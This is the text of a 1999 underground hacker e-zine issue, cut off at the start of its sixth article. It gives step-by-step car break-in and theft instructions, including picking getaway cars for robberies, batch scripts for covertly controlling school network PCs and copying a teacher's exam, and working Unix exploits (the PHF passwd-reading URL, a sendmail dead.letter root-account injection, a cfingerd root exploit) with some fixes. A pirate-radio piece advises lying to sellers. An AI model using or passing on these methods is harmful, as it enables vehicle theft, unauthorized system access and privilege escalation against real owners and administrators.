Copy Link
Add to Bookmark
Report
Underground Periodical Issue 02
:..:..:..:..:..:..:..:..:
:::::::::::::::::::::::::
:::::::: ::::::::
:::: ______ :::::
:: °/ | \ ::
::: / | \_ :::::
:::: \\ / \ ::::
::::: \______/ _ \ ::
:::: / / :::
:: / ____/ ::
:::: _/ /_ ::::
::::: \ / :::::
::: \ // :::
:::::: \/ ::::::
:::: ° ::::
:::::::...........:::::::
:::::::::::::::::::::::::
:UNDERGROUND::PERIODICAL:
:::::::::::::::::::::::::
"We're on the Up and Up"
:..:..::..Issue..::..:..:
Issue 2 April 1999
:..:..::..Editor.::..:..:
Cyborg
:.::.::.:.Staff.:.::.::.:
Cyborg
HitMan
CrossFire
:.::..Shouts Outs To.::.:
G_H
fORCE
ManiC
ZirQaz
DemonR
Freeman
Sunburst
Hellbent
LordPhaxx
:..::..:.Website.:..::..:
http://upzine.8m.com
:..::..:..E-mail.:..::..:
under_p@yahoo.com
:.::...Distributors..::.:
t245.dccnet.com:95001
http://cyborg.ie.8m.com
http://hitman.ie.8m.com
http://www.newbiehack.8m.com
:..::..Introduction.::..:
<*> Welcome to the second and thus latest greatest issue of Underground
Periodical. Well, not dead yet, as it seems. The counter on our website
indicates that there are about 600 readers. What is needed the most now
are file submissions and suggestions on how to improve it. Some people
have been complaining that they can't download Up1-00.zip from the
website so take note that there is already a few distributors. I urge
you to send us something to use, as you will get to plug your site at
the end.
<*> Due to the high demand we have started up a subscription list. To
join it just go to the bottom of our website and enter your e-mail in
the dialog box to sign up. Now issues will be e-mailed to you every
month. It will appear in digest form as a mailing list only the .zip
file will come attached. The list is powered by ListBot so what are
you waiting for? Go sign up now.
<*> Issue 1 of Up was reviewed by Anti-Social magazine this month in
their twelfth issue so download it at http://www.antisocial.cjb.net
This is very important, as it will provide the much needed constructive
criticism to help improve for next month and beyond. It might also help
to spread the URL around for the website so that more people will
download the issues thus increasing our fan base.
<*> Its readers write Underground Periodical. Without you we the staff,
the fancy ascii art, it all means nothing. You are the ones who write
the magazine. What we need to get started is submissions, send us in
your text files. We accept technical information, philosophy on the
state of the scene today, articles on free speech and censorship we are
interested in all innovations of computer culture, although we are
mostly based on underground stuff. Send your articles in text format to
the e-mail address at the top.
<*> Tell your friends!!! Tell your pals on mailing lists and IRC
channels about the Periodical. We post our existence to a few
newsgroups but it just isn't enough. We can't be everywhere at once
so advertise us to your greatest mates. If you were doing an e-zine
I'd help you out.
<*> We'd like to thank any and all people who submitted to Issue 2 or
contributed in any way. It is understood that they are automatically
included as Shout Outs. Without continued support from the underground
community we won't be able to keep Up going. It's your magazine, so
help it out a little. Anyway, on with this issue...
:..::.:..Contents.:.::..:
<*> 1 - Inroduction & Contents : Cyborg
<*> 2 - Breaking Into Cars : Franco
<*> 3 - Total Control : GPF#2
<*> 4 - Pirate Radio Series : Cyborg
<*> 5 - Unix Security Holes : CrossFire
<*> 6 - Bouncing your IP : Cyborg
<*> 7 - Breaking Accounts : HitMan
<*> 8 - Cracking Passwd Files : Cyborg
<*> 9 - Meridian Mail Tips : CFish
<*> 10 - Letters\Feedback : Readers
<*> 11 - Disclaimer & The End : Up Staff
:..::..End Of File..::..:
:..::..File 2 Of 11.::..:
:...Breaking Into Cars..:
:..::...By Franco...::..:
<*> Breaking into cars for fun, profit as well as for stealing 'em.
The purpose of this file is to educate people of the security flaws
associated with car related features (alarms, imobilizers, locks,
etc).
Now let me begin by getting a few things straight. If your the kind of
person who's going to do this thinking they're the man when drunk out
of their skull, then forget it as you have as much hope as getting away
with it as you stand not falling asleep the second you sit in the car,
trust me, friends of friends have done this so may times and got nicked
so many times that it's not even funny anymore! I'm serious, practice
and maturity is an essential!!!
There are many approaches to gaining access into a car, but it also
depends if your stealing the contents (radio, mobile phone etc.) or
stealing the car itself. If you're simply breaking into the car to
steal the contents then you've got tons of options.
(a) Smashing the window
(b) Picking the locks
(i) Now this must be the crudest of all methods on gaining access to a
car. Use a stone, screwdriver, yourself, or what ever the hell you
like. After this it's kind of self explanatory... if stealing the
contents.
<*>-----------------------------------------------------------------<*>
TIP
When breaking the glass, a good idea would be to use sticky tape,
(preferably carpet tape). This is always a good idea as it quietens the
sound of the glass breaking and practically no glass splinters will
cover the seat or floor so that when you sit down you don't end up with
a bloody arse.
<*>-----------------------------------------------------------------<*>
(b) Now as there are so many options I'm gonna break it into sections
*** Section 1
If you're trying not to damage the lock (to the naked eye) and you just
want to steal the contents to freak the owner out well here goes...
Approaches... (i) pick set (ii) electric pick gun or (iii) screwdriver
and coat hanger (or "Slim Jim") methods.
(i) If you're an unskilled bastard with no patience then go past this
bit and see (ii) and (iii) The idea behind using a pick set is to turn
the various metal slides, which in turn pops the lock pull bit up, (see
below for a pitiful diagram).
______
\ / [lock pull bit, the bit that shoots up
| | inside the car]
| |
| |
===================[glass divide]
-------------------
-------------------[rubber strip, outside]
You can use various types of files, professional ones (a bit fucking
expensive!) or make your own. See bottom of page for addresses of
suppliers). If making your own then see yet again another pitiful
diagram and follow the simple instructions...
Materials:
Irregular sized paper clip or strips of easily bendable metal (easy to
cut is a big advantage). If using the paper clip, bend the paper clip
so that it is in a complete straight line and bend one end so that it
forms a small hook to help catch the metal slides in the lock. (See
diagram below).
__
| [the hook in the clip]
______________________|
Once you've done this you will be the proud owner of a simple but
effective pick, HORAAAAAAA.
IN USE: Insert the pick into the lock and attempt to hook it behind one
of the moving parts, then with a "SERIOUSLY FIRM" grip, pull the pick
towards you using a pair of pliers. The idea being that the force being
applied is so great that instead of the pick simply shooting out, its
on its way out, manages to slip the moving parts which as you've
probably guessed opens the lock. This will take some practice and
indeed a great deal of time. Also the chances of you opening the lock
are only as good as the build of your pick.
If using the bendable metal, get a close up shot from either the
internet or a catalog of a professional pick sets. The picture must be
a close up, as you need to be able to distinguish and size the various
shapes for when it comes to actually making the picks. Simply "copy
carve" the picks and there you have it, an inexpensive professional
pick set.
IN USE: You firstly insert one pick, one that would allow a second to
be inserted at the same time and position them so that each makes
contact with the moving parts in the lock so that you can apply
sufficient leverage and in turn hopefully pop the lock. Before you
think you can go fuck if you think I'm gonna spend half an hour drawing
another bloody diagram. As this is one of the most skill-demanding
approaches, I advise much practice, and don't be discouraged easily.
<*>-----------------------------------------------------------------<*>
TIP
A good way to improve your lock picking skills is to practice them...
where? I've always found the scrap yards a fantastic practice site.
Simply find yourself a car of your own personal preference and work
away at the lock. The beauty is that if you're asked what you're doing
you can say you're trying to open the door to get a part from the
inside. As well as this, if you have your eye on a particular car you
want to steal or break into, you can go the scrap yard and examine its
locks in the knowledge that you won't be stopped and that you can't be
arrested for doing it either.
<*>-----------------------------------------------------------------<*>
(ii) This is by far the easiest of ways to open the lock though... but
this is the hideous downer, the price, expect to pay upwards of £120.
______________________
| \
| |==^===^====^====\
| ______ |====^====^====^==\
| | /| --|
| | / | |
| | / | |
| | | | [handle] |
| | | |
| | | |
| | | |
| |______| |
|____________________________|
If you're "NOT" like me and can afford one then I recommend one as with
the minimalist of practice you can be successful practically every time
even when working with many new cars. The basic principal if you don't
know, is that the file you insert into the lock vibrates when turning
on the gun and in most cases it will temporally unlock the locking
mechanism and if your'e quick enough you will be able to open the door
before the gun vibrates the lock back to the closed position. Many
private detectives and members of the government use them because of
the fact that they leave little if any scratch marks and are easy and
quick to operate, but they're not too concealed so don't get caught.
You try explaining.
Or if you want the car for a job (off license or post office job).
If this is the case your gonna want to have the car looking as
inconspicuous as possible, and that means no missing windows and no
wierd looking locks. First off a good idea is to get something reliable
(trust me it may see stupid, but so many jobs have gone arse ways when
the getaway car conks out on them), remember, a getaway car is as
essential to the job as your dick is for fucking with! Volkswagons and
Mercedes are among the best, though if getting one, get an oldish one,
(4-8 years, no flash GTI or E-500s. The way in which you would go about
opening the lock would in many cases be the pick or screwdriver
approach, (see afore mentioned sections). Near the end of the page is a
list of cars (with methods) which are simple to pick open and steal,
(iii) At this point your probably wondering where my mention about the
humble Slim Jim is. Well, wait no longer for I have prevailed. The Slim
Jim (of American origin) has been around for countless years, okay fine
30-40 years in one form or another (i.e. coat hanger). The Slim Jim is
really an ore refined rich man's coat hanger, though the coat hanger
has one undeniable advantage that it can be bent away so you don't have
to wear a long trench coat. If anyone knows or has details about a fold
away Slim Jim then please e-mail me at crops@indigo.ie or at
potmand@hotmail.com.
The basic principal behind them is very crude and measures to hamper
their uses by manufacturers are now commonplace in cars under 3-4 years
old (depends on the manufacturer... well duhh!!!). Back to the point,
the principal is that the hook or catch part when inserted between the
window and rubber seal and pushed down far enough, is that it latches
on to the pop up lock cord and usually with an upward movement "pops
the lock" and voila. Recently, re-enforced Jims have been made to cope
with motor corps such as Ford and G.M. to help counteract their counter
actions (try saying that 15 times with 10 sour balls in your mouth).
The screwdruver approach is really easy and with practice can be used
to open locks whilst leaving behind little external damage (perfect for
the careful car thief). The idea is again quite simple... all that has
to be done is that you get a set of screwdrivers, (don't go buying the
most expensive though don't buy ones which will bend easily) pick out
one you think best for the lock and shove it in and turn. Like I said,
extremely easy. Its always a good idea to use a screwdriver which has a
longish screw bit which is also thin so that you can get some depth
when working on the lock.
*** Section 2
If you don't care a toss about the appearance of the car then do what
the hell you like to open the door. What more were you expecting?
Approaches... (i) easy to steal cars (ii) locksmith contacts
<*>-----------------------------------------------------------------<*>
TIP
A good way of gaining entry to a car is through the boot lock, reason
being is that especially on oldish and old cars, the manufacturers use
lesser locks and therefore make it very easy for thieving. I've used
kitchen knives on these locks before and 75% of the time I've got in.
This is one of the easiest methods of getting into cars!
<*>-----------------------------------------------------------------<*>
(i) Cars which are easy to steal...
Morris Minor (any type), opens with an ordinary ford key (15-20 years)
or house key.
Fiats (ages 12-25) opens again by a similar approach.
Fords (aged 10-25) opens with a Ford key of the period, or a similar
key.
Volkswagons aren't reputed for being easy to steal, the new ones
anyway, but I feel I have to give them a mention because they are by
far more reliable and start in every weather condition time and time
again and are ideal. Volks (aged 7-82) open with the simple
screwdriver approach best. Remember, don't damage the lock externally
if on a job. My preference would be a Golf.
(ii) Contacts
American Locksmith Service
P.O. Box 26
Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and
3/4 inches wide, so it will both reach and slip through the new
car lock covers (inside the door). Price is $5.75 plus $2.00
postage and handling.
Lock Technology Corporation
685 Main St.
New Rochelle, NY 10801
LTC offers a cute little tool that will easily remove the lock
cylinder without harm to the vehicle, and will allow you to enter
and/or start the vehicle. The GMC-40 sells for $56.00 plus $2.00 for
postage and handling.
Steck MFG Corporation
1319 W. Stewart St.
Dayton, OH 45408
For $29.95 one can purchase a complete set of six carbon lockout tools
that will open more than 95% of all the cars around.
Veehof Supply
Box 361
Storm Lake, IO 50588
VS sells tryout keys for most cars (tryout keys are used since there is
no one master key for any one make of car, but there are group type
masters (a.k.a. tryout keys). Prices average about $20.00 a set.
:..::..End Of File..::..:
:..::..File 3 Of 11.::..:
:.::..Total Control..::.:
:..::.:..By GPF#2.:.::..:
<*> Total Control - A Project For Your School Network
Here I'll tell ya how to get what looks like total control over PCs on
a Windows LAN with low security. It can be pretty funny, and can really
freak out your friends and stuff! Things you need are: write access to
a network drive, and physical access to the target computers.
So here's what you do:
When you are going in to typing class or whatever, start up notepad,
and type in this:
@echo off
echo Logging in to network drive .....
:start
if exist h:\mydir\1.bat goto run
goto start
:run
call h:\mydir\1.bat
del h:\mydir\1.bat
goto start
Instead of "h:\mydir", change it to a server directory that you have
write access to.
Save the file as c:\target.bat
Then add a shortcut in the startup group that runs the command
"Start /m c:\target.bat".
Then the next day, sit at a different computer, and type the same thing
except typing in "2.bat" instead of "1.bat" You can continue on this
process until you have all your targets set up. This way, you get
individual control over each of the victim machines.
Now you have to write the controlling file. It's fairly long so I have
typed it out in full here for you. It is only a rough draft so mess
about with it as much as you like.
<*>--------------------------< Distrib.bat >------------------------<*>
@echo off
if a%1==a goto noparam
if a%2==a goto noparam
if %1==/? goto noparam
if not exist %1 goto nofile
if not exist %2\nul goto nodir
set srcfile=%1
set distdir=%2
shift
shift
:dodist
copy %srcfile% %distdir%\%1.bat
if a%2==a goto quit
shift
goto dodist
:noparam
echo -----====[ Total Control ]====-----
echo By GPF#2
echo.
echo USAGE:
echo distrib file directory number number number ....
echo.
echo EXAMPLE:
echo Distribute cntrl.txt to computers 2, 6, 4, 9, 11, 41, and 21
echo Using n:\log as the directory to write to:
echo distrib cntrl.txt n:\log 2 6 4 9 11 40 21
goto quit
:nofile
echo Error - Input file unfound. Type distrib /? for usage
goto quit
:nodir
echo Error - Distribution directory does not exist.
echo Type distrib /? for usage
goto quit
:quit
<*>--------------------------< Distrib.bat >------------------------<*>
So select all of the text between the markers, and copy it to the your
clipboard. Then paste it in to notepad, and save it on to a disk as
Distrib.bat . This batch file is the one you will need to run every
time you want to control a PC, so take care of it! It gives you some
info on how to use it if you type distrib /? . If you have followed all
the steps in this file, you are nearly finished. What is left now, is
to decide what you actually want the other PCs to do, and how to do it.
A really simple one is this -
1. Startup Notepad
2. Type in this:
echo I CAN SEE YOU>c:\temporary.txt
notepad c:\temporary.txt
3. Save the file as c:\IcanCU.txt
4. At the MSDOS prompt type:
"a:\distrib.bat c:\IcanCU.txt h:\mydir 1 3 4 5 7"
5. Sit back, and watch the message "I CAN SEE YOU" displayed on target
number 1, number 3, 4, 5, and number 7.
6. Don't burst your hole laughing, because they'll know it was you, and
you'll be busted!
So step 2 is the main work done by your program. This can obviously be
customised to do a lot more than just display something in Notepad.
Step 4 uses Distrib.bat to send the messages to the server. So instead
of "h:\mydir", type the directory that the victims are set to use.
Also in step 4, try to use the MSDOS prompt. This will work from the
"Run" box on the start menu, but in MSDOS prompt, each command is not
recorded.
When the messages start appearing onscreen, there will be plenty of
distractions for you to smuggle your floppy out of it's drive. Delete
the file c:\IcanCU.txt while you are at the DOS prompt also. That's the
command "del c:\IcanCU.txt" for all you Win'95 people. Actually, I just
thought of something you could do for Step 2:
Suppose a teacher was writing your summer test, and was saving it as
c:\windows\test.doc in MS Word. You could send their machine the
command:
copy c:\windows\test.doc h:\mydir
This would copy the file to the server, ready for your retrieval!
Good luck, and have fun. I did ;-)
_____
/ ___/ ________
/ / _ / \
/ /_// E N E R A L /_____ |
/____/ |_____\ |
_____ / /|
/ _ / / / /
/ // / __/__/__ / / /
/ ___/ R O T E C T I O N / / ________/ / /
/_/ __/__/__ / / /
_____ / / / ________/ /
/ ___/ / /|_______|/
/ /_ / /_/_____
/ _/ A U L T / /|
/_/ /___________/ /
|___________|/
-----Digital Artist-----
-----http://members.xoom.com/GPF2-----
-----GPF2@pmail.net-----
:..::..End Of File..::..:
:..::..File 4 Of 11.::..:
:..Pirate Radio Series..:
:..::...By Cyborg...::..:
<*> Pirate Radio Series Part II
Introduction: This file deals with starting your own pirate radio
station. It is a part two of a four part series on pirate radio. I've
researched many sites on the internet combined with my own knowledge
to write this file.
Going On The Air
- Transmitters
One of your most important and difficult investments will be the
purchase of a transmitter. You could always build your own... but it is
much easier and usually cheaper to purchase a transmitter. There are
some safety guidelines that need to be followed when operating a
transmitter. When you get your manual you would probably like to just
skip the start and get down to some business. This can be lethal.
<*>-----------------------------------------------------------------<*>
TRANSMITTERS UTILISE LETHAL VOLTAGES! NEVER OPERATE A TRANSMITTER WITH
THE SAFETY DEVICES BYPASSED! YOU COULD BE KILLED! RF ENERGY LEAVES A
DAMAGING BURN IF YOU MAKE "CONTACT"! TREAT YOUR TRANSMITTER WITH
RESPECT AND CAUTION OR IT MAY COST YOU YOUR LIFE!
<*>-----------------------------------------------------------------<*>
So what is a transmitter and what does it do? A transmitter is a device
that converts AC or DC energy to RF energy. By itself, RF energy
doesn't do you much good, so a transmitter also requires audio
information to "modulate" the RF energy it generates. The modulated RF
energy is coupled into an antenna to be dispersed into the ionosphere.
Did you get all that? Good.
Have you ever heard of a Variable Frequency Oscillator? I didn't think
so, it sounds like a device from the Starship Enterprise. This is the
next step up from Crystal Control (This means you must supply a crystal
cut or ground for a specific frequency to operate on that frequency). A
transmitter that comes equipped with a VFO or can use an external VFO
gives you freedom to operate on any frequency that it covers and where
the transmitter is able to tune up. Most VFO's will cover the ham bands
in 500 Khz segments and this can be utilized by the pirate to get
outside the ham bands. It also allows for moving your frequency at a
moments notice.
By now, you might be familiar with some terms that describe types of
modulation. Here is a quick guide:
* AM = Amplitude Modulation
* SSB = Single Side Band
* USB = Upper Side Band
* LSB = Lower Side Band
* DSB = Double Side Band
* FM = Frequency Modulation
* PM = Phase Modulation
AM modulation, a carrier wave determines your frequency and 66% of your
transmitter power is used here! The modulating signal, audio info, is
used to vary the amplitude of the carrier wave by means of upper and
lower side bands. This is where the remaining 33% of the transmitters
power goes.
The range of audible frequencies to most people is 20 to 20,000 Hertz.
In most amateur gear the audio bandwidth is restricted to 300 to 3,000
Hertz. If you wanted to be a real smart guy you could transmit on 2600
Hertz. This range is the best for projecting your voice signal. Now in
AM mode combine 2.7 Khz for both upper and lower sidebands and you have
an AM signal almost 6 Khz wide. If the frequency response of the
transmitter was increased to 10 Khz, the resulting AM signal would be
20 Khz wide! You should now be starting to understand why commercial
broadcasting stations reserve a wide berth.
Feeding your program audio into your transmitter properly can be a
difficult and frustrating challenge! To start with, a Microphone level
signal is High in impedance, typically, and quite small electrically.
This is what the input circuits of your transmitter are expecting to
see when you operate it in a voice mode. Now, the typical output level
of a tape deck is Medium in impedance and electrically much higher than
a microphone signal. This is where the trouble starts.
Ways to tell if you are experiencing problems is that your transmitted
signal will be under modulated meaning you are not supplying a large
enough signal or the reverse will be true, your transmitted signal
will be over modulated meaning it will sound distorted, will be wide,
and generally, unlistenable. Take heart that both can be cured and all
you need is a little knowledge! What you need is a matching network,
more commonly known as a PAD, between your program audio and Mic Input
of your transmitter.
You must be selective when purchasing your transmitter. Here are some
quick tips to help guide you:
* Read the fucking manual
When buying a transmitter the manuals are essential. Trying to find
manuals for older pieces of gear can be a difficult and expensive task.
these URLs provide a good stock:
http://eigen.net/w7fg/
http://www.sarrio.com/sarrio/rsfinal1.html
* Let your smell guide you
This may sound odd but stick your face right down into the transmitter,
POWER OFF! and take a big whiff! If it smells "burned" it would
probably be wise to keep looking at other transmitters. Although you
may be so embarrassed from sticking your face in that maybe you should
just run out of the store.
* Need to know basis
Under NO circumstances should you inform the potential seller of a
transmitter what you are going to be using it for! Just say something
like you are studying for your ham license. I doubt that they would be
too interested in tuning into your illegal underground station anyway.
Be careful what you say!
* Living conditions
Make sure you store your transmitter in a cool dry place. The last
thing you need is to let it get wet and die from an electric shock.
Also, don't let it overheat, again the current of electricity has no
pity on you.
- Antennas
Antennas are probably one of the most debated, most studied and cause
for the most confusion of any field in radio. The antenna is the most
important part of your station if properly constructed. For instance:
Transmitter A runs 100 watts to a improper antenna and gets heard only
marginally. Transmitter B runs 10 watts to a properly constructed,
resonant antenna and gets heard much better and louder than Transmitter
A. The quality of your antenna is a prediction of the quality of your
whole station. It is crucial to have it in working order.
Perhaps the easiest and most popular antenna is a Dipole. The dipole
antenna is easily constructed, almost impossible to mess up and works
well at almost any height above ground. For the beginner, this is the
antenna to use. For your antenna to work well, you need to determine
the frequency you are going to operate on. For example, we'll say 7445
Khz. To determine the length of wire our dipole antenna will need, we
use the following formula: 468 divided by Frequency in Megahertz =
Length in Feet. So, working the math, 468 / 7.445 = 62.86 Feet. Round
that off and we come to 62 Feet 10 Inches. This is the total length of
the antenna. To make a dipole, cut two wires, each one 31 Feet 5 Inches
long.
While not absolutely necessary, a Balun is recommended. For Dipole
antennas that are fed with Coax line, a 1 to 1 Balun is suggested. A
Balun matches a BALanced Line (uour Dipole) to an UNbalanced Line (Your
Coax). This makes for an even greater transfer of power from the
feedline to the antenna and will also prevent the ground shield of your
Coax from becoming a radiator of RF! Baluns are a complex and difficult
subject to fathom but there are books out that explain the How To's
better than I could. Just remember, A Balun is optional but is worth
the trouble and not that expensive to install one.
Another question you might be asking "How high should I try to get my
dipole?" My answer: as high as possible. If you live near hills or
mountains then maybe you can set it up concealed next to a weather
station. If that isn't possible then at least running up the side of
your house or apartment block. The higher, the better. Dipoles
typically have the most favorable radiation patterns when they are 1
wavelength above ground. In the case of our 40 Meter Dipole, that comes
to a whopping 125 Feet! I think it's safe to say that 99.99% of all 40
Meter Dipoles erected do not reach these heights.
The last consideration you need to think about is that of antenna
orientation. A dipole will radiate the majority of power in lobes that
are perpendicular to the axis of the dipole. What this means is, if you
run your dipole North to South, then the majority of your RF signal
will be radiated in a East to West pattern. So depending on your
geographical location of your transmitter and the location of your
listeners will depend on how you orient your antenna. You may also find
that there is only one or two possible ways to place your dipole on
your property, don't sweat it. Just hang it up and off you go
Look out for Part III of this series where I will discuss operating
tips and sharing the air with other radio people. Well I hope this has
been an informative read. If you would like to e-mail me regarding
anything in this file then go ahead. If you are interested in hacking,
phreaking or programming then e-mail me or visit my website:
cyborg@disinfo.net
http://cyborg.ie.8m.com
:..::..End Of File..::..:
:..::..File 5 Of 11.::..:
:..Unix Security Holes..:
:.::...By CrossFire..::.:
<*> Introduction
----------------
Ok, for like a year now I have been going on about ethical hacking, and
being the person fighting back and shit like that, so now, I have
decided to write something about Unix Security Holes, how they work,
and how to fix them. Please note, this intended as an article on how to
fix security holes, not as a cookbook for budding uebercrackers.
The Famous PHF Hole
-------------------
The PHF hole is about the most well known security hole in the
universe, although now you will be hard pushed to find a server that is
vulnerable. This hole works because of the file phf.cgi that is in the
cgi- bin directory of the apache web server. The basic function of
phf.cgi is to let a remote user execute arbitary commands on the server
machine, the most common of these is to view the password file.
How to use this hole
To test if your machine is vulnerable to this hole, go into a web
browser and in the location bar type:
http://www.yourdomain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
If you are vulnerable to this hole, you will see something like:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW admin:/home/Common/WWW:/bin/csh
Otherwise you will see an error message saying that phf.cgi was not
found on the server, or you don't have permission to view phf.cgi on
this server.
How to fix this hole
This is the obvious part, off the top of my head, I can think of 2 ways
to fix this on your server, these are: rm phf.cgi, or while root, chmod
700 /cgi-bin/phf.cgi (you must be in the root dir of the server to do
this).
The Deadletter Exploit
----------------------
Deadletter Exploit for Sendmail 8.8.4
Version affected: 8.8.4
Ok, here's a brief and interesting explonation of this famous exploit.
This exploit uses sendmail version 8.8.4 and it requires that you have
a shell acount on the server in question. The exploit creates a link
from /etc/passwd to /var/tmp/dead.letter Very simple really. Here's how
it works, below are the exact commands as you have to type them.
ln /etc/passwd /var/tmp/dead.letter
telnet target.host 25
helo <domain-name>
mail from: frostiez@bah-bah.net
rcpt to: masterbah@hotmail.com
data
frostiez::0:0:Mr Frostiez:/root:/bin/bash
.
quit
Then, when you're done, telnet to port 23 and log in as frostiez, no
password required. Thanx to a little bit of work we did, frostiez just
happens to have the same priviledges as root. There are a couple of
reasons why this might not work:
1) /var and / are different partitions (as you already know, you can't
make hard links between different partitions).
2) There is a postmaster account on a machine or mail alias, in which
case, your mail will end up there instead of being written to an
/etc/passwd.
3) /var/tmp doesn't exist or isn't publicly writable.
How to fix this Hole
Login as root at your system, then
cd /var/tmp ls -l
If there is a dead letter already, you are safe. Don't delete that one.
If there NO dead.letter, type:
touch dead.letter
chmod 600 dead.letter
This will create a dead.letter of null length. Now it is impossible to
hardlink /etc/passwd against /var/tmp/dead.letter. This exploit will
not work any more.
AnswerBook2 Exploit - Solaris Only
----------------------------------
This exploit was blatantly nicked from a sun security list, and is in
letter form.
Hello,
already in December 1997 I discovered a serious bug in the AnswerBook2
server dwhttpd/3.1a4 that ships with Solaris 2.6 (server edition). With
a simple socket connection to the AB2 port (default: 8888), *anyone* on
the network with access to that port (default: everybody, see below)
can bring the server to spin and deny further responses:
- --- snip ---
HTTP/1.0 500 Server Error
Server: dwhttpd/3.1a4 (Inso; sun5)
[...]
The server currently lacks the resources needed to handle your
request. Please try again later.
- --- snip ---
The affected dwhttpd process will eat one cpu, with possible impact on
other services. (MP machines will still have some cpus available.)
I reported this to Sun who filed a bug report
bug/sherlock/server/4099376
HTTP 1.0 HEAD request brings the dwhttpd to spin
and assigned priority "fix within 3 months". AB2 technology is a
third-party product, so Sun filed a bug with Inso who provides dwhttpd
as part of their DynaWeb toolkit. Five months later (!) now they
finally claim: It's fixed in dwhttpd/4.0 which will ship with Solaris
2.7. Still no patch for the existing AB2 package!
What you can do:
Q: Do I run dwhttpd?
A: Check for packages SUNWab2r, SUNWab2s and SUNWab2u.
Check if dwhttpd is invoked at system startup (/etc/rc2.d/S96ab2mgr)
Check with "ps -ef | grep dwhttpd"
Q: Is my AB2 server really vulnerable?
A: If you don't believe it, check yourself - the source code for a
sample "AB2 DoS attack program" (that I gave Sun to reproduce the
bug) is included in the bug report (wow - Sun publishes exploit
scripts!).
Q: I'm vulnerable - what can I do?
A: 1. The only real fix is "/etc/init.d/ab2mgr stop" (which is a DoS
itself :)
2. Restrict the access to your AB2 server port to particular clients
(e.g. intranet only) by tcp-wrapper or firewall setup.
3. Get nervous, call Sun, request a patch for this bug now.
I hope we can get Sun/Inso to produce a *patch* soon. If there are any
substantial news I will summarize again.
Best regards,
Thomas
CFingerd Exploit
----------------
(taken from rootshell)
SUMMARY
-------
I have found out that cfingerd 1.3.2 contains a security hole that
could lead to easy root compromise for any user that has an account on
the local machine, but only if ALLOW_EXECUTION is set in
/etc/cfingerd/cfingerd.conf. By default, this option is DISABLED in
Debian GNU/Linux.
DETAILS
-------
The ALLOW_EXECUTION option permits any user on the system to execute a
program when their username is fingered. cfingerd needs to run as
root but doesn't properly throw away root permissions when it starts
up the user's script.
When it is told to invoke /usr/bin/id from a user's script, it
produces:
uid=0(root) gid=0(root) euid=65534(nobody) groups=0(root)
EXPLOIT
-------
Have it exec this:
void main(void) {
setreuid(0, 0);
system("/usr/bin/id");
}
Of course, system can exec any more devious command you chose -- ie,
marking a shell setuid root, etc. (Can also be done with C calls.)
No, I am NOT going to tell you how to make a setuid shell. If you
don't know, you shouldn't be reading this.
To test the exploit, put something like this in ~/.project:
$exec /home/jgoerzen/test
and set the ALLOW_EXECUTION to be enabled. This will give root for
everything.
Additionally, as you can tell, it fails to relenquish group
permissions at all. After applying the below fix, the new output is:
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Much better!
FIX
---
Debian GNU/Linux comes with cfingerd, but in its default
configuration, it is safe. For maximum security, please install the
upgraded packages anyway. cfingerd greater than or equal to
1.3.2-11.0 will have the fix. I have uploaded the fixed packages to
Incoming; before they propogate to the mirrors, you may find them at
http://happy.cs.twsu.edu/~jgoerzen/cfingerd/ along with the new
sources.
374531a02be81021ca9a12059a3c4515 cfingerd_1.3.2-11.0.diff.gz
f8819601f85115c063d5cace970554d6 cfingerd_1.3.2-11.0.dsc
2f943297e0b73fe32345e932f11b6a58 cfingerd_1.3.2-11.0_i386.changes
b9df424d723da39aa9c0067171822d56 cfingerd_1.3.2-11.0_i386.deb
4a3403d2519fea6b829bdeda9026c8ad cfingerd_1.3.2-11.0_i386.upload
Those of you not using Debian may apply the following diff.
--- cfingerd-1.3.2.orig/src/privs.h
+++ cfingerd-1.3.2/src/privs.h
@@ -29,6 +29,7 @@
#ifndef _USE_BSD
#define _USE_BSD 1
#include <unistd.h>
+#include <grp.h>
#undef _USE_BSD
#else
#include <unistd.h>
@@ -72,14 +73,20 @@
extern
#endif
gid_t real_gid, effective_gid;
+#ifndef MAIN
+extern
+#endif
+gid_t grouplist[1];
#define RELINQUISH_PRIVS { \
real_uid = getuid(); \
effective_uid = NOBODY_UID; \
real_gid = getgid(); \
effective_gid = NOBODY_GID; \
- setregid(real_gid, effective_gid); \
- setreuid(real_uid, effective_uid); \
+ grouplist[0] = effective_gid; \
+ setgroups(1, grouplist); \
+ setregid(effective_gid, effective_gid); \
+ setreuid(effective_uid, effective_uid); \
}
#define PRIV_ROOT_START {\
@@ -87,25 +94,29 @@
setregid(effective_gid, real_gid); \
#define PRIV_ROOT_END \
- setregid(real_gid, effective_gid); \
- setreuid(real_uid, effective_uid); \
+ setregid(effective_gid, effective_gid); \
+ setreuid(effective_uid, effective_uid); \
}
#define USER_PRIVS(a,b) {\
- setreuid(real_uid, 0); \
- setregid(real_gid, 0); \
+ setreuid(0, 0); \
+ setregid(0, 0); \
effective_uid = (a); \
effective_gid = (b); \
- setregid(real_gid, effective_gid); \
- setreuid(real_uid, effective_uid); \
+ grouplist[0] = effective_gid; \
+ setgroups(1, grouplist); \
+ setregid(effective_gid, effective_gid); \
+ setreuid(effective_uid, effective_uid); \
}
#define NOBODY_PRIVS \
- setreuid(real_uid, 0); \
- setregid(real_gid, 0); \
+ setreuid(0, 0); \
+ setregid(0, 0); \
effective_uid = NOBODY_UID; \
effective_gid = NOBODY_GID; \
- setreuid(real_uid, effective_uid); \
- setregid(real_gid, effective_gid);
+ grouplist[0] = NOBODY_GID; \
+ setgroups(1, grouplist); \
+ setgid(NOBODY_GID); \
+ setuid(NOBODY_UID);
#endif /* _PRIVS_H_ */
ADDITIONAL CREDIT goes to Jakob Bohm Jensen <jbj@image.dk>. He
reported some other things (not these in particular) that didn't turn
out to be a hole but lead me to examine the code carefully.
John Goerzen Linux, consulting & programming jgoerzen@complete.org |
Developer, Debian GNU/Linux (Free powerful OS upgrade) www.debian.org |
+---------------------------------------------------------------------+
Visit the Air Capital Linux Users Group on the web at:
http://www.aclug.org
Conclusion
----------
I Hope this article has enlightened you to certain security holes and
how to fix them, for further info on security holes, check out
www.rootshell.com or www.geek-girl.org/bugtraq.
XFire
crossfire@hackers-uk.freeserve.co.uk
:..::..End Of File..::..:
:..::..File 6 Of 11.::..:
:.:..Bouncing Your IP.:.:
:..::...By Cyborg...::..:
<*> Introduction: This file deals with bouncing your connection through
servers. It also meant to clear up some misconceptions about your
